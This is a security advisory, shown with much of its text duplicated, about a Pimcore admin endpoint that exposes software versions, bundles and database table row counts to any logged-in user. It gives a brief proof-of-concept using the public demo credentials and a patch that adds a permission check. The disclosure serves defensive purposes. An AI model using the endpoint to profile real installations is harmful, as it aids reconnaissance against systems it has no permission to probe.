![[image](https://github.com/user-attachments/assets/f0f478da-ceca-4bd5-a391-3fe8458fa3d2)](https://github.com/user-attachments/assets/f0f478da-ceca-4bd5-a391-3fe8458fa3d2)
![[image](https://github.com/user-attachments/assets/152f6ad7-2cb3-42eb-bf05-1066a3496d59)](https://github.com/user-attachments/assets/152f6ad7-2cb3-42eb-bf05-1066a3496d59)

In Pimcore Version 10.6.9:
![[image](https://github.com/user-attachments/assets/907fb8d8-81b3-450f-bdb0-3e6193bfc243)](https://github.com/user-attachments/assets/907fb8d8-81b3-450f-bdb0-3e6193bfc243)
![[image](https://github.com/user-attachments/assets/c4d89b88-f458-4023-a29f-d2ef652b2c3b)](https://github.com/user-attachments/assets/c4d89b88-f458-4023-a29f-d2ef652b2c3b)

### PoC

- [[Demo App](https://demo.pimcore.fun/admin)](https://demo.pimcore.fun/admin) with credentials user: admin and pass: demo
- Watching Network-Tab in Developer-Tools and looking for `/admin/index/statistics`

### Impact

Only for logged in Pimcore users possible.

### Workaround and Patch

We patched the following additional check for Pimcore v10.6.9. This uses an app-specific class but any user permission would be ok.
This resolves navigating to `/admin/index/statistics`.

```patch
diff --git a/vendor/pimcore/pimcore/bundles/AdminBundle/Controller/Admin/IndexController.php b/vendor/pimcore/pimcore/bundles/AdminBundle/Controller/Admin/IndexController.php
--- a/vendor/pimcore/pimcore/bundles/AdminBundle/Controller/Admin/IndexController.php    (revision dd81ef4c666b18c254333867a60f6ed455025076)
+++ b/vendor/pimcore/pimcore/bundles/AdminBundle/Controller/Admin/IndexController.php    (date 1721225746781)
@@ -15,6 +15,7 @@

namespace Pimcore\Bundle\AdminBundle\Controller\Admin;

+use App\Constant\UserPermission;
use Doctrine\DBAL\Connection;
use Exception;
use Pimcore\Analytics\Google\Config\SiteConfigProvider;
@@ -142,6 +143,12 @@
throw $this->createAccessDeniedHttpException();
}

+        $user = $this->tokenResolver->getUser();
+
+        if (!$user->isAdmin() && !$user->isAllowed(UserPermission::ADMIN_INDEX_VIEW)) {
+            throw $this->createAccessDeniedException();
+        }
+
// DB
try {
$tables = $db->fetchAllAssociative('SELECT TABLE_NAME as name,TABLE_ROWS as `rows` from information_schema.TABLES
````

For the Pimcore versions in the UI we used the IndexActionSettingsEvent. This works for Versions < Pimcore 11:

```php
<?php

namespace App\EventListener\Admin;

use App\Constant\UserPermission;
use Pimcore\Bundle\AdminBundle\Event\AdminEvents;
use Pimcore\Event\Admin\IndexActionSettingsEvent;
use Pimcore\Security\User\TokenStorageUserResolver;
use Symfony\Component\EventDispatcher\EventSubscriberInterface;

/**
* @deprecated and cannot be used in Pimcore 11
*/
class PimcoreVersionUIGuardSubscriber implements EventSubscriberInterface
{
    public function __construct(private readonly TokenStorageUserResolver $tokenResolver)
    {
    }

    public static function getSubscribedEvents()
    {
        return [
            AdminEvents::INDEX_ACTION_SETTINGS => ['onIndexActionSettingsEvent'],
        ];
    }

    public function onIndexActionSettingsEvent(IndexActionSettingsEvent $event): void
    {
        $user = $this->tokenResolver->getUser();
        if ($user->isAdmin() || $user->isAllowed(UserPermission::ADMIN_INDEX_VIEW)) {
            return;
        }

        $settings = $event->getSettings();
        $settings['instanceId'] = '';
        $settings['version'] = '';
        $settings['build'] = '';
        $event->setSettings($settings);
    }
}
```

**Summary**

Navigating to /admin/index/statistics with a **logged in Pimcore user** (not an XmlHttpRequest because of this check: IndexController:125) exposes information about the Pimcore installation, PHP version, MYSQL version, installed bundles and all database tables and their row count in the system.

> The web server should not return any product and version information of the components used. The table names and row counts should not be exposed.

**Details**

/admin/index/statistics returns the following JSON-response:

    {
        {
            "instanceId": "...",
            "pimcore_major_version": 11,
            "pimcore_version": "v11.3.1",
            "pimcore_hash": "3ecd39f21dbdd25ffdf4bec6e2c860eccfd3d008",
            "pimcore_platform_version": "v2024.2",
            "php_version": "8.3.8",
            "mysql_version": "10.11.8-MariaDB-ubu2204",
        "bundles": [
            // all installed bundles
        ],
        "tables": [
            // all tables and their row count, e.g:
            {
                "name": "users",
                "rows": 2
            },
        ]
    }
    

Information about the Pimcore Version can also be seen here:

In a current Version:  
  

In Pimcore Version 10.6.9:  
  

**PoC**

*   \[Demo App\](https://demo.pimcore.fun/admin) with credentials user: admin and pass: demo
*   Watching Network-Tab in Developer-Tools and looking for /admin/index/statistics

**Impact**

Only for logged in Pimcore users possible.

**Workaround and Patch**

We patched the following additional check for Pimcore v10.6.9. This uses an app-specific class but any user permission would be ok.  
This resolves navigating to /admin/index/statistics.

diff --git a/vendor/pimcore/pimcore/bundles/AdminBundle/Controller/Admin/IndexController.php b/vendor/pimcore/pimcore/bundles/AdminBundle/Controller/Admin/IndexController.php
\--- a/vendor/pimcore/pimcore/bundles/AdminBundle/Controller/Admin/IndexController.php    (revision dd81ef4c666b18c254333867a60f6ed455025076)
+++ b/vendor/pimcore/pimcore/bundles/AdminBundle/Controller/Admin/IndexController.php    (date 1721225746781)
@@ -15,6 +15,7 @@

namespace Pimcore\\Bundle\\AdminBundle\\Controller\\Admin;

+use App\\Constant\\UserPermission;
use Doctrine\\DBAL\\Connection;
use Exception;
use Pimcore\\Analytics\\Google\\Config\\SiteConfigProvider;
@@ -142,6 +143,12 @@
throw $this->createAccessDeniedHttpException();
}

+        $user = $this->tokenResolver->getUser();
+
+        if (!$user->isAdmin() && !$user->isAllowed(UserPermission::ADMIN\_INDEX\_VIEW)) {
+            throw $this->createAccessDeniedException();
+        }
+
// DB
try {
$tables = $db->fetchAllAssociative('SELECT TABLE\_NAME as name,TABLE\_ROWS as \`rows\` from information\_schema.TABLES

For the Pimcore versions in the UI we used the IndexActionSettingsEvent. This works for Versions < Pimcore 11:

<?php

namespace App\\EventListener\\Admin;

use App\\Constant\\UserPermission;
use Pimcore\\Bundle\\AdminBundle\\Event\\AdminEvents;
use Pimcore\\Event\\Admin\\IndexActionSettingsEvent;
use Pimcore\\Security\\User\\TokenStorageUserResolver;
use Symfony\\Component\\EventDispatcher\\EventSubscriberInterface;

/\*\*
\* @deprecated and cannot be used in Pimcore 11
\*/
class PimcoreVersionUIGuardSubscriber implements EventSubscriberInterface
{
    public function \_\_construct(private readonly TokenStorageUserResolver $tokenResolver)
    {
    }

    public static function getSubscribedEvents()
    {
        return \[
            AdminEvents::INDEX\_ACTION\_SETTINGS => \['onIndexActionSettingsEvent'\],
        \];
    }

    public function onIndexActionSettingsEvent(IndexActionSettingsEvent $event): void
    {
        $user = $this\->tokenResolver\->getUser();
        if ($user\->isAdmin() || $user\->isAllowed(UserPermission::ADMIN\_INDEX\_VIEW)) {
            return;
        }

        $settings = $event\->getSettings();
        $settings\['instanceId'\] = '';
        $settings\['version'\] = '';
        $settings\['build'\] = '';
        $event\->setSettings($settings);
    }
}

**References**

*   GHSA-fx6j-9pp6-ph36
*   pimcore/admin-ui-classic-bundle@afa10bf
*   https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/IndexController.php#L125C24-L125C40
*   https://github.com/pimcore/admin-ui-classic-bundle/releases/tag/v1.5.2

Tag

#php